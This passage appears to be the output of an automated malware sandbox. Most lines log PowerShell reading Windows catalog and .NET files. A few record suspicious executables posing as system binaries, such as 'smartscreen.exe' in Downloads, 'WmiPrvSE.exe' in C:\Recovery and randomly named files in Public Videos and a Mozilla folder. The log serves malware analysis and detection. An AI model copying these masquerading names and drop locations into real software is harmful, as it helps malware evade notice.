                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
                            Source: C:\Users\user\Downloads\smartscreen.exeQueries volume information: C:\Users\user\Downloads\smartscreen.exe VolumeInformation
                            Source: C:\Users\user\Downloads\smartscreen.exeQueries volume information: C:\Users\user\Downloads\smartscreen.exe VolumeInformation
                            Source: C:\Recovery\WmiPrvSE.exeQueries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
                            Source: C:\Recovery\WmiPrvSE.exeQueries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeQueries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
